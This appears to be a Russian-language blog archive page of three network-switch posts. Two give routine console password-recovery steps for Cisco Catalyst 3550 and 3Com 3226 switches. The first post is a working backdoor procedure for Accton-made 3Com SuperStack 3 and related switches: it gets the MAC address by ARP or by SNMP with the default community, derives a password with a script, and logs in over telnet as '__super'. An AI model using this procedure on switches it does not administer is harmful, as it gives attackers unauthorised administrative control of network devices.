Archive for switch

Взлом пароля на свитче 3Com SuperStack 3 backdoor

// Июнь 17th, 2013 // No Comments » // 3Com, hack, recovery password, switch

Оказалось, что линейка свитчей 3Com SuperStack 3 (а еще и некоторые свитчи Dell, SMC, Foundry и EdgeCore) вовсе не 3Com, а Accton. В документации к бэкдору упоминаются модели 3Com 3812, 3Com 3870, Edgecore ES4649 и Dell PowerConnect 5224, я проводил эксперимент на 3Com 3226 и 3250.

Суть бэкдора в том, что производитель заложил возможность авторизоваться на свитче зная его мак, который скриптом можно превратить в пароль, естественно все работает только в том случаи если у вас есть доступ к свитчу по telnet/ssh или http.

Для начала начала, нужно раздобыть мак адрес, если свитч находится в одной L2 сети с вами достаточно сделать ping и посмотреть ARP таблицу, например так:

C:\>ping 10.28.28.28
Обмен пакетами с 10.28.28.28 по 32 байт:
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Статистика Ping для 10.28.28.28:
    Пакетов: отправлено = 4, получено = 4, потеряно = 0 (0% потерь),
Приблизительное время приема-передачи в мс:
    Минимальное = 0мсек, Максимальное = 0 мсек, Среднее = 0 мсек

C:\>arp -a 10.28.28.28
Интерфейс: 10.28.28.28 --- 0x10005
  Адрес IP              Физический адрес      Тип
  10.28.28.28           00-12-a9-c9-ac-c0     динамический

Если свитч находится за маршрутизатором, можно попробовать достать его мак через протокол SNMP, если его администратор не отключил или не поменял комьюнити по умолчанию.

$ snmpget -v1 -c public 10.28.28.28 IF-MIB::ifPhysAddress.1001
IF-MIB::ifPhysAddress.1001 = STRING: 0:12:a9:c9:ac:c0

Скачать скрипт accton.pl
запустить скрипт и в качестве параметра указать мак, с разделителем «:»:

./accton.pl 00:12:a9:c9:ac:c0
BUvypQd!

вот собственно «BUvypQd!» и будет пароль.
Подключаемся к свитчю через telnet, вводим логин «__super» и пароль, который сгенерировал скрипт:

$ telnet 10.28.28.28
Trying 10.28.28.28...
Connected to 10.28.28.28.
Escape character is '^]'.
Login: __super
Password: BUvypQd!

Menu options: -----------3Com SuperStack 3 Switch 3226-------------------------
 bridge              - Administer bridge-wide parameters
 feature             - Administer system features
 gettingStarted      - Basic device configuration
 logout              - Logout of the Command Line Interface
 physicalInterface   - Administer physical interfaces
 protocol            - Administer protocols
 security            - Administer security
 system              - Administer system-level functions
 trafficManagement   - Administer traffic management

Type ? for help.
--------------------------------3Com 3226 (1)--------------------------------
Select menu option:

Ссылка на описание бэкдора http://www.exploit-db.com/exploits/14875/

Cisco Catalyst WS-C3550 сброс пароля (password recovery)

// Март 14th, 2013 // No Comments » // Cisco, recovery password, switch

WS-C3550-24PWR-SMI

  1. Подключить свитч консольным кабелем с настройками:
    скорость: 9600 бит/с
    бит данных: 8 (bits)
    четность: нет (no parity)
    стоповый бит: 1
    управление потоком: нет
  2. Выключить питание свитча
  3. Зажать кнопку Mode и включить питание
  4. Когда индикатор System перестанет моргать — отпустить кнопку Mode, на экране должно быть приглашение:
  5. Xmodem file system is available.
    The password-recovery mechanism is enabled.
    
    The system has been interrupted prior to initializing the
    flash filesystem.  The following commands will initialize
    the flash filesystem, and finish loading the operating
    system software:
    
        flash_init
        boot
    
    switch:
  6. Ввести команду flash_init для инициализации Flash памяти:
    switch: flash_init
    Initializing Flash...
    flashfs[0]: 91 files, 4 directories
    flashfs[0]: 0 orphaned files, 0 orphaned directories
    flashfs[0]: Total bytes: 15998976
    flashfs[0]: Bytes used: 8177152
    flashfs[0]: Bytes available: 7821824
    flashfs[0]: flashfs fsck took 19 seconds.
    ...done Initializing Flash.
    Boot Sector Filesystem (bs:) installed, fsid: 3
  7. Ввести команду load_helper для инициализации помощника, будет загружен первый из доступных образов:
    switch: load_helper
  8. Просмотреть содержимое Flash карты можно командой dir flash:
    switch: dir flash:
    Directory of flash:/
    
    2    -rwx  320       <date>               system_env_vars
    3    -rwx  2224      <date>               config-text.old
    5    -rwx  4968676   <date>               c3550-i5k2l2q3-mz.121-22.EA4.bin
    7    drwx  128       <date>               c3550-i5k2l2q3-mz.121-20.EA1
    6    -rwx  30        <date>               env_vars
    8    -rwx  2116      <date>               vlan.dat
    9    -rwx  4650      <date>               config-text
    11   -rwx  24        <date>               private-config.text
    7821824 bytes available (8177152 bytes used)
  9. Переименовать или удалить старый конфиг:
    switch: rename flash:config-text flash:config-text.backup
    switch: delete flash:config-text
    Are you sure you want to delete "flash:config-text" (y/n)?y
    File "flash:config-text" deleted
  10. Загрузить образ командой boot
    switch: boot
    Loading "flash:c3550-i5k2l2q3-mz.121-22.EA4.bin"...
    #############################

Свитч загрузится с пустой конфигурацией:

         --- System Configuration Dialog ---

Would you like to enter the initial configuration dialog? [yes/no]: n



Press RETURN to get started!


Switch>

(далее…)

Сброс пароля 3Com SUPERSTACK 3 3226 3250

// Сентябрь 15th, 2012 // 1 Comment » // 3Com, recovery password, switch

3com 3226Подключится стандартным консольным кабелем, в параметра порта установить скорость 19200 (в некоторых инструкциях встречается еще загадочная скорость 18600).
Дождаться загрузки, на запрос логина ответить «recover» и пароль «recover». Появится надпись с предложением перезагрузить свитч и счетчиком обратного отсчета, в течении 30 секунд свитч нужно перезагрузить.
После перезагрузки, должно появится:

Enter the new password for the Administrator:

введите новый пароль для логина admin.